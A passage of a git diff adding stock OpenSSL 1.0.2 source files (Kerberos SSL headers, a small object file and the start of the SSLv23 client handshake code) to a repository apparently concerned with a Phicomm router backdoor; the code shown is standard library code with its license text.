+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ **      19990701        VRS     Started.
+ */
+
+#ifndef KSSL_H
+# define KSSL_H
+
+# include <openssl/opensslconf.h>
+
+# ifndef OPENSSL_NO_KRB5
+
+#  include <stdio.h>
+#  include <ctype.h>
+#  include <krb5.h>
+#  ifdef OPENSSL_SYS_WIN32
+/*
+ * These can sometimes get redefined indirectly by krb5 header files after
+ * they get undefed in ossl_typ.h
+ */
+#   undef X509_NAME
+#   undef X509_EXTENSIONS
+#   undef OCSP_REQUEST
+#   undef OCSP_RESPONSE
+#  endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ *      Depending on which KRB5 implementation used, some types from
+ *      the other may be missing.  Resolve that here and now
+ */
+#  ifdef KRB5_HEIMDAL
+typedef unsigned char krb5_octet;
+#   define FAR
+#  else
+
+#   ifndef FAR
+#    define FAR
+#   endif
+
+#  endif
+
+/*-
+ *      Uncomment this to debug kssl problems or
+ *      to trace usage of the Kerberos session key
+ *
+ *      #define         KSSL_DEBUG
+ */
+
+#  ifndef KRB5SVC
+#   define KRB5SVC "host"
+#  endif
+
+#  ifndef KRB5KEYTAB
+#   define KRB5KEYTAB      "/etc/krb5.keytab"
+#  endif
+
+#  ifndef KRB5SENDAUTH
+#   define KRB5SENDAUTH    1
+#  endif
+
+#  ifndef KRB5CHECKAUTH
+#   define KRB5CHECKAUTH   1
+#  endif
+
+#  ifndef KSSL_CLOCKSKEW
+#   define KSSL_CLOCKSKEW  300;
+#  endif
+
+#  define KSSL_ERR_MAX    255
+typedef struct kssl_err_st {
+    int reason;
+    char text[KSSL_ERR_MAX + 1];
+} KSSL_ERR;
+
+/*-     Context for passing
+ *              (1) Kerberos session key to SSL, and
+ *              (2)     Config data between application and SSL lib
+ */
+typedef struct kssl_ctx_st {
+    /*      used by:    disposition:            */
+    char *service_name;         /* C,S default ok (kssl) */
+    char *service_host;         /* C input, REQUIRED */
+    char *client_princ;         /* S output from krb5 ticket */
+    char *keytab_file;          /* S NULL (/etc/krb5.keytab) */
+    char *cred_cache;           /* C NULL (default) */
+    krb5_enctype enctype;
+    int length;
+    krb5_octet FAR *key;
+} KSSL_CTX;
+
+#  define KSSL_CLIENT     1
+#  define KSSL_SERVER     2
+#  define KSSL_SERVICE    3
+#  define KSSL_KEYTAB     4
+
+#  define KSSL_CTX_OK     0
+#  define KSSL_CTX_ERR    1
+#  define KSSL_NOMEM      2
+
+/* Public (for use by applications that use OpenSSL with Kerberos 5 support */
+krb5_error_code kssl_ctx_setstring(KSSL_CTX *kssl_ctx, int which, char *text);
+KSSL_CTX *kssl_ctx_new(void);
+KSSL_CTX *kssl_ctx_free(KSSL_CTX *kssl_ctx);
+void kssl_ctx_show(KSSL_CTX *kssl_ctx);
+krb5_error_code kssl_ctx_setprinc(KSSL_CTX *kssl_ctx, int which,
+                                  krb5_data *realm, krb5_data *entity,
+                                  int nentities);
+krb5_error_code kssl_cget_tkt(KSSL_CTX *kssl_ctx, krb5_data **enc_tktp,
+                              krb5_data *authenp, KSSL_ERR *kssl_err);
+krb5_error_code kssl_sget_tkt(KSSL_CTX *kssl_ctx, krb5_data *indata,
+                              krb5_ticket_times *ttimes, KSSL_ERR *kssl_err);
+krb5_error_code kssl_ctx_setkey(KSSL_CTX *kssl_ctx, krb5_keyblock *session);
+void kssl_err_set(KSSL_ERR *kssl_err, int reason, char *text);
+void kssl_krb5_free_data_contents(krb5_context context, krb5_data *data);
+krb5_error_code kssl_build_principal_2(krb5_context context,
+                                       krb5_principal *princ, int rlen,
+                                       const char *realm, int slen,
+                                       const char *svc, int hlen,
+                                       const char *host);
+krb5_error_code kssl_validate_times(krb5_timestamp atime,
+                                    krb5_ticket_times *ttimes);
+krb5_error_code kssl_check_authent(KSSL_CTX *kssl_ctx, krb5_data *authentp,
+                                   krb5_timestamp *atimep,
+                                   KSSL_ERR *kssl_err);
+unsigned char *kssl_skip_confound(krb5_enctype enctype, unsigned char *authn);
+
+void SSL_set0_kssl_ctx(SSL *s, KSSL_CTX *kctx);
+KSSL_CTX *SSL_get0_kssl_ctx(SSL *s);
+char *kssl_ctx_get0_client_princ(KSSL_CTX *kctx);
+
+#ifdef  __cplusplus
+}
+#endif
+# endif                         /* OPENSSL_NO_KRB5 */
+#endif                          /* KSSL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.o
new file mode 100644
index 0000000000000000000000000000000000000000..1ad185a3d2fed9429fc1bc1852c5bb2cc1bb2b82
GIT binary patch
literal 1072
zcmbVL%}T>S5T11F?@4chmv~aqE~!6=9wbm|FCtzFy(Tdz#Qe}~z+UPr_$WR?U&$xX
znawU;HmRTkv$ON<d^5AN$@}pBuH!hM#erK`dKv}zG(ca%K5WAlz-TbIagWAfm5Iu|
z=I7k&^{*=F_UC6F_b!fWxX#r@vxB;ZI(isG2Vg-ML;X#td>6jH+hSO2$CMMZw+LHN
zjmfT>1P1F(5D|tQH6$s^R~`ZIa+Zo9L@TDXebGA+zX{+^fe3(yWeGgW(=^Ty%W@HO
z980ehL6j)}IjeXv&5L*{W{q-x1@@6Zv$SvIuSjG(yNo!%l`#9ge0kbjZ2lpJY@+^`
ze~Mhn>7kn9E9b-naj)xZdud>1Xkt3XUh_0G#LWh({bdy@z*SZox~nOa&*swkhYDIK
nOFXRv?I|4pxW?@0=utJ=R!>o-*~QhKJsnIGe<Guni+%qel-D>7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl_lcl.h
new file mode 100644
index 0000000..46dcef2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl_lcl.h
@@ -0,0 +1,88 @@
+/* ssl/kssl.h -*- mode: C; c-file-style: "eay" -*- */
+/*
+ * Written by Vern Staats <staatsvr@asc.hpc.mil> for the OpenSSL project
+ * 2000. project 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef KSSL_LCL_H
+# define KSSL_LCL_H
+
+# include <openssl/kssl.h>
+
+# ifndef OPENSSL_NO_KRB5
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Private (internal to OpenSSL) */
+void print_krb5_data(char *label, krb5_data *kdata);
+void print_krb5_authdata(char *label, krb5_authdata **adata);
+void print_krb5_keyblock(char *label, krb5_keyblock *keyblk);
+
+char *kstring(char *string);
+char *knumber(int len, krb5_octet *contents);
+
+const EVP_CIPHER *kssl_map_enc(krb5_enctype enctype);
+
+int kssl_keytab_is_available(KSSL_CTX *kssl_ctx);
+int kssl_tgt_is_available(KSSL_CTX *kssl_ctx);
+
+#ifdef  __cplusplus
+}
+#endif
+# endif                         /* OPENSSL_NO_KRB5 */
+#endif                          /* KSSL_LCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_clnt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_clnt.c
new file mode 100644
index 0000000..e4e707c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_clnt.c
@@ -0,0 +1,809 @@
+/* ssl/s23_clnt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+
+static const SSL_METHOD *ssl23_get_client_method(int ver);
+static int ssl23_client_hello(SSL *s);
+static int ssl23_get_server_hello(SSL *s);
+static const SSL_METHOD *ssl23_get_client_method(int ver)
+{
+#ifndef OPENSSL_NO_SSL2
+    if (ver == SSL2_VERSION)
+        return (SSLv2_client_method());
+#endif
+#ifndef OPENSSL_NO_SSL3
+    if (ver == SSL3_VERSION)
+        return (SSLv3_client_method());
+#endif
+    if (ver == TLS1_VERSION)
+        return (TLSv1_client_method());
+    else if (ver == TLS1_1_VERSION)
+        return (TLSv1_1_client_method());
+    else if (ver == TLS1_2_VERSION)
+        return (TLSv1_2_client_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl23_meth_func(SSLv23_client_method,
+                          ssl_undefined_function,
+                          ssl23_connect, ssl23_get_client_method)
+
+int ssl23_connect(SSL *s)
+{
+    BUF_MEM *buf = NULL;
+    unsigned long Time = (unsigned long)time(NULL);
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int ret = -1;
+    int new_state, state;
+
+    RAND_add(&Time, sizeof(Time), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_BEFORE:
+        case SSL_ST_CONNECT:
+        case SSL_ST_BEFORE | SSL_ST_CONNECT:
+        case SSL_ST_OK | SSL_ST_CONNECT:
+
+            if (s->session != NULL) {
+                SSLerr(SSL_F_SSL23_CONNECT,
+                       SSL_R_SSL23_DOING_SESSION_ID_REUSE);
+                ret = -1;
+                goto end;
+            }
+            s->server = 0;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            /* s->version=TLS1_VERSION; */
+            s->type = SSL_ST_CONNECT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+                buf = NULL;
+            }
+
+            if (!ssl3_setup_buffers(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            ssl3_init_finished_mac(s);
+
+            s->state = SSL23_ST_CW_CLNT_HELLO_A;
+            s->ctx->stats.sess_connect++;
+            s->init_num = 0;
+            break;
+
+        case SSL23_ST_CW_CLNT_HELLO_A:
+        case SSL23_ST_CW_CLNT_HELLO_B:
+
+            s->shutdown = 0;
+            ret = ssl23_client_hello(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL23_ST_CR_SRVR_HELLO_A;
+            s->init_num = 0;
+
+            break;
+
+        case SSL23_ST_CR_SRVR_HELLO_A:
+        case SSL23_ST_CR_SRVR_HELLO_B:
+            ret = ssl23_get_server_hello(s);
+            if (ret >= 0)
+                cb = NULL;
+            goto end;
+            /* break; */
+
+        default:
+            SSLerr(SSL_F_SSL23_CONNECT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* break; */
+        }
+
+        if (s->debug) {
+            (void)BIO_flush(s->wbio);
+        }
+
+        if ((cb != NULL) && (s->state != state)) {
+            new_state = s->state;
+            s->state = state;
+            cb(s, SSL_CB_CONNECT_LOOP, 1);
+            s->state = new_state;
+        }
+    }
+ end:
+    s->in_handshake--;
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    if (cb != NULL)
+        cb(s, SSL_CB_CONNECT_EXIT, ret);
+    return (ret);
+}
+
+static int ssl23_no_ssl2_ciphers(SSL *s)
+{
+    SSL_CIPHER *cipher;
+    STACK_OF(SSL_CIPHER) *ciphers;
+    int i;
+    ciphers = SSL_get_ciphers(s);
+    for (i = 0; i < sk_SSL_CIPHER_num(ciphers); i++) {
+        cipher = sk_SSL_CIPHER_value(ciphers, i);
+        if (cipher->algorithm_ssl == SSL_SSLV2)
+            return 0;
+    }
+    return 1;
+}
+
+/*
+ * Fill a ClientRandom or ServerRandom field of length len. Returns <= 0 on
+ * failure, 1 on success.
+ */
+int ssl_fill_hello_random(SSL *s, int server, unsigned char *result, int len)
+{
+    int send_time = 0;
+    if (len < 4)
+        return 0;
+    if (server)
+        send_time = (s->mode & SSL_MODE_SEND_SERVERHELLO_TIME) != 0;
+    else
+        send_time = (s->mode & SSL_MODE_SEND_CLIENTHELLO_TIME) != 0;
+    if (send_time) {
+        unsigned long Time = (unsigned long)time(NULL);
+        unsigned char *p = result;
+        l2n(Time, p);
+        return RAND_pseudo_bytes(p, len - 4);
+    } else
+        return RAND_pseudo_bytes(result, len);
+}
+
+static int ssl23_client_hello(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p, *d;
+    int i, ch_len;
+    unsigned long l;
+    int ssl2_compat;
+    int version = 0, version_major, version_minor;
+    int al = 0;
+#ifndef OPENSSL_NO_COMP
+    int j;
+    SSL_COMP *comp;
+#endif
+    int ret;
+    unsigned long mask, options = s->options;
+
+    ssl2_compat = (options & SSL_OP_NO_SSLv2) ? 0 : 1;
+
+    if (ssl2_compat && ssl23_no_ssl2_ciphers(s))
+        ssl2_compat = 0;
+
+    /*
+     * SSL_OP_NO_X disables all protocols above X *if* there are
+     * some protocols below X enabled. This is required in order
+     * to maintain "version capability" vector contiguous. So
+     * that if application wants to disable TLS1.0 in favour of
+     * TLS1>=1, it would be insufficient to pass SSL_NO_TLSv1, the
+     * answer is SSL_OP_NO_TLSv1|SSL_OP_NO_SSLv3|SSL_OP_NO_SSLv2.
+     */
+    mask = SSL_OP_NO_TLSv1_1 | SSL_OP_NO_TLSv1
+#if !defined(OPENSSL_NO_SSL3)
+        | SSL_OP_NO_SSLv3
+#endif
+#if !defined(OPENSSL_NO_SSL2)
+        | (ssl2_compat ? SSL_OP_NO_SSLv2 : 0)
+#endif
+        ;
+#if !defined(OPENSSL_NO_TLS1_2_CLIENT)
+    version = TLS1_2_VERSION;
+
+    if ((options & SSL_OP_NO_TLSv1_2) && (options & mask) != mask)
+        version = TLS1_1_VERSION;
+#else
+    version = TLS1_1_VERSION;
+#endif
+    mask &= ~SSL_OP_NO_TLSv1_1;
+    if ((options & SSL_OP_NO_TLSv1_1) && (options & mask) != mask)
+        version = TLS1_VERSION;
+    mask &= ~SSL_OP_NO_TLSv1;
+#if !defined(OPENSSL_NO_SSL3)
+    if ((options & SSL_OP_NO_TLSv1) && (options & mask) != mask)
+        version = SSL3_VERSION;
+    mask &= ~SSL_OP_NO_SSLv3;
+#endif
+#if !defined(OPENSSL_NO_SSL2)
+    if ((options & SSL_OP_NO_SSLv3) && (options & mask) != mask)
+        version = SSL2_VERSION;
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (version != SSL2_VERSION) {
+        /*
+         * have to disable SSL 2.0 compatibility if we need TLS extensions
+         */
+
+        if (s->tlsext_hostname != NULL)
+            ssl2_compat = 0;
+        if (s->tlsext_status_type != -1)
+            ssl2_compat = 0;
+# ifdef TLSEXT_TYPE_opaque_prf_input
+        if (s->ctx->tlsext_opaque_prf_input_callback != 0
+            || s->tlsext_opaque_prf_input != NULL)
+            ssl2_compat = 0;
+# endif
+        if (s->cert->cli_ext.meths_count != 0)
+            ssl2_compat = 0;
+    }
+#endif
+
+    buf = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL23_ST_CW_CLNT_HELLO_A) {
+#if 0
+        /* don't reuse session-id's */
+        if (!ssl_get_new_session(s, 0)) {
+            return (-1);
+        }
+#endif
+
+        p = s->s3->client_random;
+        if (ssl_fill_hello_random(s, 0, p, SSL3_RANDOM_SIZE) <= 0)
+            return -1;
+
+        if (version == TLS1_2_VERSION) {
+            version_major = TLS1_2_VERSION_MAJOR;
+            version_minor = TLS1_2_VERSION_MINOR;
+        } else if (tls1_suiteb(s)) {
+            SSLerr(SSL_F_SSL23_CLIENT_HELLO,
+                   SSL_R_ONLY_TLS_1_2_ALLOWED_IN_SUITEB_MODE);
+            return -1;
+        } else if (version == TLS1_1_VERSION) {
+            version_major = TLS1_1_VERSION_MAJOR;
+            version_minor = TLS1_1_VERSION_MINOR;
+        } else if (version == TLS1_VERSION) {
+            version_major = TLS1_VERSION_MAJOR;
+            version_minor = TLS1_VERSION_MINOR;
+        }
+#ifdef OPENSSL_FIPS
+        else if (FIPS_mode()) {
+            SSLerr(SSL_F_SSL23_CLIENT_HELLO,
+                   SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE);
+            return -1;
+        }
+#endif
+        else if (version == SSL3_VERSION) {
+            version_major = SSL3_VERSION_MAJOR;
+            version_minor = SSL3_VERSION_MINOR;
+        } else if (version == SSL2_VERSION) {
+            version_major = SSL2_VERSION_MAJOR;
+            version_minor = SSL2_VERSION_MINOR;
+        } else {
+            SSLerr(SSL_F_SSL23_CLIENT_HELLO, SSL_R_NO_PROTOCOLS_AVAILABLE);
+            return (-1);
+        }
+
+        s->client_version = version;
+
+        if (ssl2_compat) {
+            /* create SSL 2.0 compatible Client Hello */
+
+            /* two byte record header will be written last */
+            d = &(buf[2]);
+            p = d + 9;          /* leave space for message type, version,
+                                 * individual length fields */
+
+            *(d++) = SSL2_MT_CLIENT_HELLO;
+            *(d++) = version_major;
+            *(d++) = version_minor;
+
+            /* Ciphers supported */
+            i = ssl_cipher_list_to_bytes(s, SSL_get_ciphers(s), p, 0);
+            if (i == 0) {
+                /* no ciphers */
+                SSLerr(SSL_F_SSL23_CLIENT_HELLO, SSL_R_NO_CIPHERS_AVAILABLE);
+                return -1;
+            }
+            s2n(i, d);
+            p += i;
+
+            /*
+             * put in the session-id length (zero since there is no reuse)
+             */
+#if 0
+            s->session->session_id_length = 0;
+#endif
+            s2n(0, d);
+
+            if (s->options & SSL_OP_NETSCAPE_CHALLENGE_BUG)
+                ch_len = SSL2_CHALLENGE_LENGTH;
+            else
+                ch_len = SSL2_MAX_CHALLENGE_LENGTH;
+
+            /* write out sslv2 challenge */
+            /*
+             * Note that ch_len must be <= SSL3_RANDOM_SIZE (32), because it
+             * is one of SSL2_MAX_CHALLENGE_LENGTH (32) or
+             * SSL2_MAX_CHALLENGE_LENGTH (16), but leave the check in for
+             * futurproofing
+             */
+            if (SSL3_RANDOM_SIZE < ch_len)
+                i = SSL3_RANDOM_SIZE;
+            else
+                i = ch_len;
+            s2n(i, d);
+            memset(&(s->s3->client_random[0]), 0, SSL3_RANDOM_SIZE);
+            if (RAND_pseudo_bytes
+                (&(s->s3->client_random[SSL3_RANDOM_SIZE - i]), i) <= 0)
+                return -1;
+
+            memcpy(p, &(s->s3->client_random[SSL3_RANDOM_SIZE - i]), i);
+            p += i;
+
+            i = p - &(buf[2]);
+            buf[0] = ((i >> 8) & 0xff) | 0x80;
+            buf[1] = (i & 0xff);
+
+            /* number of bytes to write */
+            s->init_num = i + 2;
+            s->init_off = 0;
+
+            ssl3_finish_mac(s, &(buf[2]), i);
+        } else {
+            /* create Client Hello in SSL 3.0/TLS 1.0 format */
+
+            /*
+             * do the record header (5 bytes) and handshake message header (4
+             * bytes) last
+             */
+            d = p = &(buf[9]);
+
+            *(p++) = version_major;
+            *(p++) = version_minor;
+
+            /* Random stuff */
+            memcpy(p, s->s3->client_random, SSL3_RANDOM_SIZE);
+            p += SSL3_RANDOM_SIZE;
+
+            /* Session ID (zero since there is no reuse) */
+            *(p++) = 0;
+
+            /* Ciphers supported (using SSL 3.0/TLS 1.0 format) */
+            i = ssl_cipher_list_to_bytes(s, SSL_get_ciphers(s), &(p[2]),
+                                         ssl3_put_cipher_by_char);
+            if (i == 0) {
+                SSLerr(SSL_F_SSL23_CLIENT_HELLO, SSL_R_NO_CIPHERS_AVAILABLE);
+                return -1;
+            }
+#ifdef OPENSSL_MAX_TLS1_2_CIPHER_LENGTH
+            /*
+             * Some servers hang if client hello > 256 bytes as hack
+             * workaround chop number of supported ciphers to keep it well
+             * below this if we use TLS v1.2
+             */
+            if (TLS1_get_version(s) >= TLS1_2_VERSION
+                && i > OPENSSL_MAX_TLS1_2_CIPHER_LENGTH)
+                i = OPENSSL_MAX_TLS1_2_CIPHER_LENGTH & ~1;
+#endif
+            s2n(i, p);
+            p += i;
+
+            /* COMPRESSION */
+#ifdef OPENSSL_NO_COMP
+            *(p++) = 1;
+#else
+            if ((s->options & SSL_OP_NO_COMPRESSION)
+                || !s->ctx->comp_methods)
+                j = 0;
+            else
+                j = sk_SSL_COMP_num(s->ctx->comp_methods);
+            *(p++) = 1 + j;
+            for (i = 0; i < j; i++) {
+                comp = sk_SSL_COMP_value(s->ctx->comp_methods, i);
+                *(p++) = comp->id;
+            }
+#endif
+            *(p++) = 0;         /* Add the NULL method */
+
+#ifndef OPENSSL_NO_TLSEXT
+            /* TLS extensions */
+            if (ssl_prepare_clienthello_tlsext(s) <= 0) {
+                SSLerr(SSL_F_SSL23_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
+                return -1;
+            }
+            if ((p =
+                 ssl_add_clienthello_tlsext(s, p,
